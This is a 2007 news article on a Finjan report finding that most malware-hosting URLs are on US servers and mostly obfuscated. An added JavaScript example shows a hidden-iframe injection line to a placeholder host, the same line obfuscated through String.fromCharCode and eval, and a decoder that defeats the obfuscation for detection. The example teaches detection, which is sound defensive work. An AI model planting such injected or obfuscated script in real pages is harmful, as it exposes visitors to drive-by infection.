Russia’s Latest Export To America: Malware

Russia may deserve its reputation as ‘virus central.’ After all, it’s the place where viruses are made and sold, complete with a service contract. But where do you suppose all that malicious code ends up? According to security provider Finjan, more of that code ends up on American servers than anywhere else.

In its Q1 2007 Web Security Trends Report, Finjan examined 10 million unique URLs and also investigated the server behind each domain. It found that over 80 percent of the URLs containing malicious code are hosted on servers in the United States, followed by the UK, with 10 percent of the code.

A recent survey by McAfee’s SiteAdvisor found that South Pacific island nations were among the worst offenders when it came to hosting malware, but SiteAdvisor never dug into where the site was actually based, only its top-level domain.

Tokelau, the tiny nation of 1,200 people, was among the worst offenders, but its domain registration service is provided by a San Francisco company, and just because you register a .tk domain doesn’t mean the server is actually hosted on the island.

What Finjan found is that while the code may originate in Russia or China, its distributors find poorly maintained or poorly secured servers in the U.S. to host it, such as free hosting sites or abandoned sites with no one monitoring them.

Either way, it doesn’t reflect well on the U.S., the dominant nation on the Internet, which often points the accusing finger at Russia. “That’s the big surprise. You would expect in the U.S. that this would not happen,” Yuval Ben-Itzhak, CTO for Finjan, told

While it’s usually in out-of-the-way locations or on cheap or free hosting sites, malware gets into high-profile places, too, such as Wikipedia. And during the Super Bowl this past January, the homepage for Dolphin Stadium in Miami was also infected.

It reflects a losing battle for the good guys, according to one analyst. “It’s hard to secure your stuff. It takes constant effort,” said Peter Firstbrook, research director with Gartner. “I’m a security expert and I don’t know how to secure a server. A small business has no hope in hell. The stuff we’re talking about is a case of the hackers knowing way more than the defenders.”

In looking behind the URL at the site itself, Finjan found that most of the sites pushing malicious code did it through advertising links that are embedded in a page, frame or link. Ben-Itzhak said this makes tracing the malicious code difficult because there is such a lengthy chain of connections to all of these advertisers.

The other big revelation in the Finjan report is that more than 80 percent of malicious code is obfuscated, making pattern matching and signature-based malware detection software useless.

“Given the threat of malicious code and the dynamic nature of the Web, what’s needed is real time inspection technologies to inspect code on the fly as it comes over the wire, not signatures. You need to inspect whatever content is on the wire and not the originator,” he said.
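To show why a byte-level signature misses obfuscated script while an inspector that decodes the content on the wire does not, here is an added example (not from the article, Finjan or Gartner); the signature, the two sample scripts and the `example.invalid` host are constructed for illustration.

```javascript
// Added example: signature matching on raw bytes versus matching after
// normalising the content. Signature and samples are constructed.

// Constructed signature: a hidden-iframe injection, the kind of embedded
// frame vector the article says advertising links are used for.
const SIGNATURE = /document\.write\(['"]<iframe[^>]*width=["']?0/i;

// Constructed sample 1: the pattern in plain text.
const PLAIN =
  `document.write('<iframe src="http://example.invalid/x" width=0 height=0>');`;

// Constructed sample 2: the same behaviour with the string assembled from
// character codes, so the literal bytes never appear on the wire.
const codes = Array.from(PLAIN).map(c => c.charCodeAt(0)).join(',');
const OBFUSCATED = `eval(String.fromCharCode(${codes}));`;

// Naive matching on the content exactly as received.
function signatureMatch(content) {
  return SIGNATURE.test(content);
}

// Decode common string-construction idioms without executing anything:
// String.fromCharCode(n,n,...), \xNN, \uNNNN and %NN escapes. Loop until the
// text stops changing so layered encodings are peeled one layer at a time.
function normalise(content) {
  let prev;
  let cur = content;
  do {
    prev = cur;
    cur = cur
      .replace(/String\.fromCharCode\(([\d,\s]+)\)/g, (_, list) =>
        String.fromCharCode(...list.split(',').map(Number)))
      .replace(/\\x([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
      .replace(/\\u([0-9a-f]{4})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
      .replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
  } while (cur !== prev);
  return cur;
}

// Real-time inspection: match against the decoded form, not the raw bytes.
function inspect(content) {
  return signatureMatch(normalise(content));
}
```

Running `signatureMatch` on both samples catches only the plain one; `inspect` catches both, which is the gap between URL or pattern filtering and inspecting the content itself.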

Firstbrook agreed. “More companies need to filter at the Web gateway. Only 15 percent do now, and most do just URL filtering and that’s not effective,” he said.

URL filtering companies may have huge databases of bad URLs, but Firstbrook said the half-life of a phishing site is 20 minutes, making a signature or URL database worthless. “We need the kind of code detection that runs in real time and doesn’t rely on knowing the threat beforehand,” he said.
